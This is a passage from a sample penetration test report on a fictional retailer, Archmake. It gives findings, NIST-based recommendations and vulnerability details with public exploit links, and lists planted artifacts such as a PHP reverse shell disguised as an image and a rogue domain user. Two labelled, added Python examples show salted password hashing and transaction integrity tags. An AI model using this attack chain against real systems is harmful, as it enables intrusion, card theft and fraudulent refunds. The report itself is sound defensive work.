It is believed, but not tested, that new orders could be placed and shipped to attacker created customer 
entities. This was not verified due to the disruption it would cause to the Archmake workflow. 

By exerting control over the backend database system, it was possible to have control over the entirety 
of the Archmake order process. This is of extreme importance to Archmake, due to the amount of 
disruption it could cause to its business processes. Additionally, the ability of an attacker to obtain direct 
financial benefit from this attack makes Archmake an extremely attractive target. 

For details of the exploited vulnerability, please see Appendix A. 
Conclusion 

In the course of the external penetration test, Archmake suffered a cascading series of breaches that led 
to conditions that would directly harm the company as well as its customers. 

The specific goals of the penetration test were stated as: 

o Identify if a remote attacker could penetrate Archmake's defenses, 
o Determine the impact of a security breach on: 

o The integrity of the company's order systems. 

o The confidentiality of the company's customer information. 

o The internal infrastructure and availability of Archmake's information systems. 

These goals of the penetration test were met. It was determined that a remote attacker would be able 
to penetrate Archmake's defenses. To make this situation even worse, the initial attack vector can be 
discovered via automated scanning, creating a situation where a remote attack could be initiated on a 
non-targeted basis. The impact of this penetration led to the complete control of Archmake's 
information systems by the attacker. 

Archmake's customer privacy was directly impacted through the attacker's ability to obtain a large 
amount of information about them, including clear text passwords, through the use of a brute force 
attack. This exposes the customers to direct attack, which could lead to financial impact. Customer trust 
in Archmake would be negatively impacted were such an event to occur. 

It was possible to obtain complete and total control over the company order process. This provided the 
attacker with the ability to steal funds from Archmake, making this attack both very damaging and very 
attractive. 

Recommendations 

Due to the impact to the overall organization as uncovered by this penetration test, appropriate 
resources should be allocated to ensure that remediation efforts are accomplished in a timely manner. 
While a comprehensive list of items that should be implemented is beyond the scope of this 
engagement, some high level items are important to mention. 

1. Implement and enforce change control across all systems: Misconfiguration 
and insecure deployment issues were discovered across the various systems. The vulnerabilities 
that arose can be mitigated through the use of change control processes on all server systems. 

2. Implement regular firewall rule set reviews: Review the firewall rule set on a regular basis to 
ensure that all systems open to internal traffic continue to have a business reason to exist. We 
recommend that NIST SP 800-41 7 be consulted for guidelines on firewall configuration and 
testing. 

3. Implement a patch management program: Operating a consistent patch management program 
per the guidelines outlined in NIST SP 800-40 8 is an important component in maintaining good 
security posture. This will help to limit the attack surface that results from running unpatched 
internal services. 

4. Conduct regular vulnerability assessments: As part of an effective organizational risk 
management strategy, vulnerability assessments should be conducted on a regular basis. Doing 
so will allow the organization to determine if the installed security controls are installed 
properly, operating as intended, and producing the desired outcome. Consult NIST SP 800-30 9 
for guidelines on operating an effective risk management program. 

5. Restrict network access to server management interfaces: Proper network segmentation will 
reduce exposure to internal attacks against the server environment. Operating a well-designed 
DMZ will allow Archmake to conduct its e-commerce business in a manner that does not expose 
internal systems to attack. Consult FIPS 191 10 for guidelines on securing local area networks. 

6. Restrict access to critical systems: It is recommended that the database server be isolated from 
other systems. If possible, a whitelist of database commands should be implemented specifying 
the minimum number of commands required to support business operations. This is in line with 
the system design concept of least privilege, and will limit the amount of damage an attacker 
can inflict on corporate resources. Consult NIST SP 800-27 RevA 11 for guidelines on achieving a 
security baseline for IT systems. 

7. Apply industry methodologies for secure software design: The use of hard-coded credentials 
within custom applications is highly discouraged. Users should have a need to know, and be 
required to provide credentials before accessing confidential and proprietary data. This 
provides better security, and an audit trail that allows the business to tie actions to specific user 
accounts. 



7 http://csrc.nist.gov/publications/nistpubs/800-41-Rev1/sp800-41-rev1.pdf 

8 http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf 

9 http://csrc.nist.gov/publications/PubsDrafts.html#SP-800-30-Rev.%201 

10 http://csrc.nist.gov/publications/fips/fips191/fips191.pdf 

11 http://csrc.nist.gov/publications/nistpubs/800-27A/SP800-27-RevA.pdf 



For details on the specific exploited vulnerabilities, please see Appendix A. 



Risk Rating 

The overall risk posed to Archmake as a result of this penetration test is High. A non-targeted attacker 
has the potential to damage the company in a manner that would have direct operational and financial 
impact. 
Appendix A: Vulnerability Detail and Mitigation 

Risk Rating Scale 

In accordance with NIST SP 800-30, discovered vulnerabilities are ranked based upon likelihood and 
impact to determine overall risk. 



Unprotected WP-Admin Access 

Rating: High 

Affected System: www.Archmake.com 

Description: Access to the www.Archmake.com administrative interface is only protected by a 
username and password combination. It is suggested best practice to only allow 
specific hosts access to any administrative interface. 

Impact: If an attacker is able to obtain valid credentials or a valid session to the 
administrative interface, there are no additional controls in place to prevent 
privilege escalation. In the course of this penetration test, additional layers of 
defense on this interface would have mitigated the initial foothold 
gained by the attackers. 

Remediation: Implement controls to only allow connections to the administrative interface 
from known hosts. A potential method for achieving this could be through only 
allowing access from clients that are behind the company VPN or a whitelist of 
known trusted hosts. 



Vulnerable WordPress Search Plugin 

Rating: High 

Affected System: www.Archmake.com 

Description: The www.Archmake.com system is operating with a vulnerable WordPress plugin 
(Relevanssi User Searches) that interacts with the public search function of the 
site. The flaw is a stored cross-site scripting (XSS) vulnerability: JavaScript 
submitted through the search function is stored and later executed. 

Public Exploit: http://www.exploit-db.com/exploits/16233/ 

Impact: This vulnerability can be utilized to obtain a valid session to the WordPress 
administration interface, providing the attacker with administrative access to the 
overall system. 

Remediation: Update the Relevanssi plugin to a version greater than 2.7.2. 



Webserver Bzip Vulnerability 

Rating: High 

Affected System: www.Archmake.com 

Description: The version of bzip2 running on the remote system is vulnerable to a race 
condition that, when properly exploited, results in arbitrary code execution. 

Public Exploit: http://www.exploit-db.com/exploits/18147/ 

Impact: By utilizing a public exploit for this flaw, root level privileges can be obtained. 

Remediation: Apply vendor-supplied patches to update bzip2 to a version greater than 1.0.5-6. 



Vulnerable Splunk Installation 

Rating: High 

Affected System: 10.10.0.3 

Description: The version of Splunk on the remote host is vulnerable to remote command 
injection. 

Public Exploit: http://www.exploit-db.com/exploits/18245/ 

Impact: An unauthenticated remote user with access to the Splunk host can execute 
commands as the Local System user. 

Remediation: Update the Splunk installation to version 4.2.5 or higher. 



Hardcoded Username and Password in Executable 

Rating: High 

Affected System: 10.10.0.3 

Description: The exportcsv.exe application on the remote host was found to be operating 
with database credentials hardcoded into the application. 

Impact: By extracting the credentials from the application, direct connections to the 
database server were possible. The credentials had administrative level access, 
which provides full control over the database contents. This has the effect of 
granting total control of the backend system to the attacker. 

Remediation: Deploy interactive authentication as part of the application start-up process. 
Have unique username/password combinations for each entity that accesses the 
system. Create a whitelist of the least number of required commands that are 
permitted for each account. 



Database Unsalted Password Storage 

Rating: High 

Affected System: 10.10.0.5 

Description: Passwords stored on the database server were discovered to be unsalted 12 . 

Impact: By storing passwords without salting them, brute force attacks against the 
system were able to obtain the clear text values with minimal effort. In this 
instance, it provided the attackers with the clear text passwords of the vast 
majority of Archmake's customers, exposing them to potential future attacks. 

Remediation: Make use of stronger encryption/hashes in the future. Ensure that all 
appropriate measures are taken to ensure the security of sensitive data at rest. 
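As an added illustration (not Archmake's code and not part of the original report) of why the unsalted hashes fell so quickly and what the remediation above means in practice: the unsalted MD5 scheme found on the database server, beside a salted, iterated PBKDF2-HMAC-SHA256 replacement. The record format and iteration count are assumptions.

```python
"""Unsalted MD5 storage (as found on the Archmake database server) beside a
salted, iterated PBKDF2-HMAC-SHA256 scheme. Added example, not Archmake code."""
import hashlib
import hmac
import os
from collections import Counter
from typing import List, Optional


# --- Scheme found during the test: unsalted MD5 ------------------------------
def md5_store(password: str) -> str:
    """Every user with the same password gets the same digest, so one digest
    can be looked up in a precomputed table or cracked once for all of them."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def md5_verify(password: str, stored: str) -> bool:
    return hmac.compare_digest(md5_store(password), stored)


# --- Replacement: per-user random salt plus an iterated slow hash ------------
# Record format is an assumption for this example:
#   "pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>"
PBKDF2_ITERATIONS = 600_000


def pbkdf2_store(password: str, salt: Optional[bytes] = None,
                 iterations: int = PBKDF2_ITERATIONS) -> str:
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False                      # malformed record, never "valid"
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def shared_digest_accounts(records: List[str]) -> int:
    """Number of stored records that share their digest with another record.
    Under unsalted MD5 this is the number of accounts whose password someone
    else also chose; under the salted scheme it is zero, so every record has
    to be attacked on its own."""
    counts = Counter(records)
    return sum(n for n in counts.values() if n > 1)


if __name__ == "__main__":
    # Constructed sample: three customers, two of whom chose the same password.
    passwords = ["abode", "adjust", "abode"]
    print(shared_digest_accounts([md5_store(p) for p in passwords]))      # 2
    print(shared_digest_accounts(
        [pbkdf2_store(p, iterations=1000) for p in passwords]))          # 0
```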



Unprotected Database Server 

Rating: High 

Affected System: 10.10.0.5 

Description: The database server was found to be operating on a flat network, which allowed 
connections from the local LAN. Due to the sensitivity of this system, additional 
controls should be put into place to ensure its protection. 

Impact: Once credentials to the database server were discovered, it was trivial to obtain 
full control over the system. This resulted in a much greater impact to the 
organization. 

Remediation: Implement additional layers of defense for the database server. This may include 
moving the database server to a separate network and strictly controlling ingress 
and egress traffic to it. 



12 http://en.wikipedia.org/wiki/Salt_(cryptography) 



Database Contains Unencrypted Credit Card Numbers 

Rating: High 

Affected System: 10.10.0.5 

Description: It was discovered that in the course of transaction processing, credit card 
numbers are stored in clear text on the database server for a brief period of 
time. 

Impact: While the time that credit card numbers are in the database is short, it was 
enough of an exposure to allow the attackers to obtain them on a consistent 
basis. This compromised the integrity of all credit cards that are processed by the 
system. 

Remediation: The design and architecture of the transaction processing system should be 
reviewed. This review will identify which additional controls should be put in 
place to better protect customer data. 



Lack of Transaction Verification 

Rating: High 

Affected System: 10.10.0.5 

Description: No verification was in place to validate the source of transactions submitted to 
the database for processing. 

Impact: By not validating the integrity of the submitted transactions, it was possible for 
the attackers to submit arbitrary transactions and have them processed by the 
system as if they were authentic. In the course of the penetration test, this 
vulnerability allowed refunds to be processed against attacker-supplied credit 
cards. 

Remediation: Controls should be added to verify the integrity of transactions before 
processing. 
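One way to implement the integrity check this remediation calls for, and that would have stopped the injected Category 4 refund described under "Attacker Control of Archmake Transactions": the order-entry system attaches a keyed tag to each row, and the processing job verifies the tag before acting on the Category. Added example, not Archmake's code; the Tag column, the key handling and all row values other than the first row of the report's table are assumptions.

```python
"""Keyed integrity tag for rows in the Archmake order table, so the periodic
processing job only acts on rows written by the order-entry system.
Added example, not Archmake's code."""
import hashlib
import hmac
from typing import Dict, List

FIELDS = ("CustID", "CreditCard", "Category", "Amount")  # columns from the report
TAG = "Tag"                                               # assumed extra column
SEP = "\x1f"                                              # unit separator, never in values
CATEGORY_REFUND = "4"                                     # "Refund, Card refunded funds"

Row = Dict[str, str]


def canonical(row: Row) -> bytes:
    """Fixed field order plus a separator that may not occur in any value, so
    two different rows can never serialise to the same bytes."""
    values = [str(row[f]) for f in FIELDS]
    if any(SEP in v for v in values):
        raise ValueError("separator byte in field value")
    return SEP.join(values).encode("utf-8")


def tag_row(row: Row, key: bytes) -> str:
    return hmac.new(key, canonical(row), hashlib.sha256).hexdigest()


def order_entry_write(row: Row, key: bytes) -> Row:
    """What the order-entry path stores: the row plus its tag. The key lives
    with the order-entry and processing code, never in the database, since an
    attacker holding the hardcoded DB credentials can read every table."""
    tagged = dict(row)
    tagged[TAG] = tag_row(row, key)
    return tagged


def process_batch(rows: List[Row], key: bytes) -> Dict[str, List[Row]]:
    """Processing job: verify the tag before acting on Category. Rows injected
    directly into the table (no tag) or edited after entry (stale tag) are
    rejected and reported instead of being charged or refunded."""
    accepted: List[Row] = []
    rejected: List[Row] = []
    for row in rows:
        expected = tag_row(row, key)
        if hmac.compare_digest(expected, str(row.get(TAG, ""))):
            accepted.append(row)
        else:
            rejected.append(row)
    return {"accepted": accepted, "rejected": rejected}


if __name__ == "__main__":
    key = b"example-key-replace-with-a-managed-secret"       # placeholder key
    legit = order_entry_write({"CustID": "448917", "CreditCard": "4716428624251690",
                               "Category": "1", "Amount": "326,450.06"}, key)
    # Row written straight into the table: valid CustID, placeholder card, Category 4.
    injected = {"CustID": "448917", "CreditCard": "4111111111111111",
                "Category": CATEGORY_REFUND, "Amount": "9,999.99"}
    # Legitimate row altered after entry: its stored tag no longer matches.
    altered = dict(legit)
    altered["Category"] = CATEGORY_REFUND
    result = process_batch([legit, injected, altered], key)
    print(len(result["accepted"]), len(result["rejected"]))      # 1 2
```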



SSH Key Files not Password Protected 

Rating: Medium 

Affected System: www.Archmake.com 

Description: Once root privileges were obtained, it was possible to make use of the installed 
ssh key files as they were not password protected. It is considered best practice 
to protect ssh key files through the use of passwords. 

Impact: By utilizing the existing ssh key files and ssh tunnels, it was possible to remotely 
access the system without altering the root user's password. This minimized the 
chances of being detected. 

Remediation: Use passwords to protect all ssh key files. 



Outbound Access from Webserver 

Rating: Medium 

Affected System: www.Archmake.com 

Description: The www.Archmake.com system was discovered to allow outbound connections 
to specific ports. While some filtering is in place, outbound connections to TCP 
port 53 were discovered to be open. It is best practice to only allow traffic from 
externally initiated connections to valid server ports. 

Impact: The permitted outbound connections were used to establish interactive access 
to the impacted system. If this were not allowed, the attacker's abilities would 
have been impaired. 

Remediation: Employ egress filtering in the DMZ to only allow servers to initiate connections to 
specific hosts on specific ports. 



WordPress Upload Plugin Invalid File Type Checks 

Rating: Low 

Affected System: www.Archmake.com 

Description: The admin upload plugin has implemented file type checking in a manner that is 
ineffective. 

Impact: Impact of this issue is low due to the fact that only administrative users have 
access to this functionality. This flaw was utilized to ease transferring files to the 
impacted system. If this issue was corrected, alternative means for file transfer 
would have been utilized. 

Remediation: Correct file type checking or disable the plugin if the functionality is not required. 
Appendix B: List of Changes made to Archmake Systems 

The following files were altered or created as part of this penetration test. Specific details of how or why 
these files were altered are included in the Attack Narrative. 



www.Archmake.com: 

/root/.ssh/authorized_keys 

Files uploaded into /var/www/wp-content/uploads: 
o face.png 
o php-reverse-shell.png.php 
o race.png 

10.10.0.3: 

All files located in C:\Users\hacker\Downloads 

Windows domain: 

"hacker" user created 
Appendix C: About Offensive Security 

Offensive Security advocates penetration testing for impact as opposed to penetration testing for 
coverage. Penetration testing for coverage has risen in popularity in recent years as a simplified method 
for companies to meet regulatory needs. As a form of vulnerability scanning, penetration testing for 
coverage includes selective verification of discovered issues through exploitation. This allows service 
providers to conduct the work largely through the use of automated toolsets and maintain consistency 
of product across multiple engagements. 

Penetration testing for impact is a form of attack simulation under controlled conditions. This more 
closely mimics the real world, targeted attack threat that organizations face on a day-to-day basis. 
Penetration testing for impact is a goal-based assessment that goes beyond a simple vulnerability 
inventory and instead establishes the true business impact of a breach. An impact-based penetration test 
identifies areas for improvement that will result in the highest rate of return for the business. 

Penetration testing for impact poses the challenge of requiring a high skillset to successfully complete. 
As demonstrated in this sample report, Offensive Security believes that it is uniquely qualified to deliver 
world-class results when conducting penetration tests for impact due to the level of expertise found 
within our team of security professionals. Offensive Security does not maintain a separate team for 
penetration testing and the other activities that the company is engaged in. This means that the 
individuals involved in Offensive Security's industry leading performance-based training, the 
production of industry standard tools such as BackTrack Linux, the authoring of best selling books, and 
the maintenance of industry references such as Exploit-DB are the same individuals that deliver its 
services. 

Offensive Security offers a product that cannot be matched in the current market. However, we may not 
be the right fit for every job. Offensive Security typically conducts consulting services with a low volume, 
high skill ratio to allow Offensive Security staff to more closely mimic real world situations. This also 
allows customers to have increased access to industry-recognized expertise all while keeping costs 
reasonable. As such, high volume, fast turnaround engagements are often not a good fit. Offensive 
Security is focused on conducting high quality, high impact assessments and is actively sought out by 
customers in need of services that cannot be delivered by other vendors. 

If you would like to discuss your penetration testing needs, please contact us at info@offsec.com. 